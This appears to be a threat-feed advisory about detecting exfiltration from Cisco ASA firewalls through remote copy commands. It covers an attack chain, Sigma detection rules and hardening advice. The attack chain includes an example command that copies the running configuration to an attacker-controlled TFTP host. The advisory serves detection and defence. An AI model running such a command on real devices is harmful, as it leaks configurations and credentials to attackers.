Skip to content
Threat Feed
high advisory

Cisco ASA Device File Copy to Remote Location

The analytic detects file copy operations from Cisco ASA devices to remote locations using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP, potentially indicating data exfiltration by threat actors targeting network devices.

This detection identifies file copy operations from Cisco ASA devices to remote locations, which could signal data exfiltration attempts. Threat actors targeting network infrastructure may attempt to exfiltrate sensitive data, including device configurations, logs, and packet captures, to attacker-controlled infrastructure. The analytic focuses on detecting unusual copy commands executed via the CLI or ASDM interface. Specifically, it monitors Cisco ASA logs (message IDs 111008 and 111010) for copy commands using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP. Legitimate backups to centralized servers are common, however copies to unexpected or external destinations are suspicious. This activity is associated with threat actors targeting perimeter network devices, like the ArcaneDoor campaign. Defenders should investigate copies to unexpected destinations, from non-administrative accounts, or outside approved maintenance windows.

Attack Chain

  1. Attacker gains initial access to the Cisco ASA device, possibly through compromised credentials or exploiting a vulnerability.
  2. Attacker authenticates to the ASA device via SSH, Telnet, CLI, or ASDM.
  3. Attacker executes commands to copy sensitive files, such as the running configuration (running-config) or startup configuration (startup-config).
  4. The copy command is used with a remote protocol (TFTP, FTP, HTTP, HTTPS, SMB, SCP) to specify the destination server. For example, copy running-config tftp://<attacker_ip>/config.txt.
  5. The ASA device initiates a network connection to the attacker-controlled server using the specified protocol.
  6. The sensitive file is transferred to the remote server.
  7. Attacker uses exfiltrated data to gain further knowledge of the network environment or for malicious purposes.
  8. The attacker attempts to remove evidence of the file copy operation from the ASA device's logs.

Impact

Successful exfiltration of Cisco ASA device configurations and logs can provide attackers with valuable information about network topology, security policies, usernames, passwords and other sensitive data. This information can be used to facilitate further attacks, such as lateral movement within the network, compromising additional systems, or gaining unauthorized access to sensitive resources. Organizations in any sector could be affected if their perimeter security devices are compromised.

Recommendation

  • Enable Cisco ASA syslog logging and ensure message IDs 111008 and 111010 are captured to enable this detection.
  • Deploy the Sigma rule Cisco ASA - Device File Copy to Remote Location to your SIEM and tune the filters to exclude known legitimate backup activities.
  • Investigate any alerts generated by the Sigma rule, paying close attention to the destination IP address, user account, and time of the activity.
  • Monitor network traffic for connections originating from Cisco ASA devices to external IP addresses using file transfer protocols (TFTP, FTP, HTTP, HTTPS, SMB, SCP).
  • Review and restrict access to Cisco ASA devices, enforcing strong password policies and multi-factor authentication to prevent unauthorized access.
  • Implement network segmentation to limit the impact of a compromised ASA device.

Detection coverage 2

Cisco ASA - Device File Copy to Remote Location

high

Detects file copy operations to remote locations on Cisco ASA devices, potentially indicating data exfiltration.

sigma tactics: exfiltration techniques: T1041, T1048.003 sources: firewall, cisco

Cisco ASA - Remote Protocol File Transfer

medium

Detects the use of remote file transfer protocols (TFTP, FTP, HTTP, HTTPS, SMB, SCP) on Cisco ASA devices, potentially indicating unauthorized file transfers or data exfiltration attempts.

sigma tactics: exfiltration techniques: T1041, T1048.003 sources: firewall, cisco

Detection queries are available on the platform. Get full rules →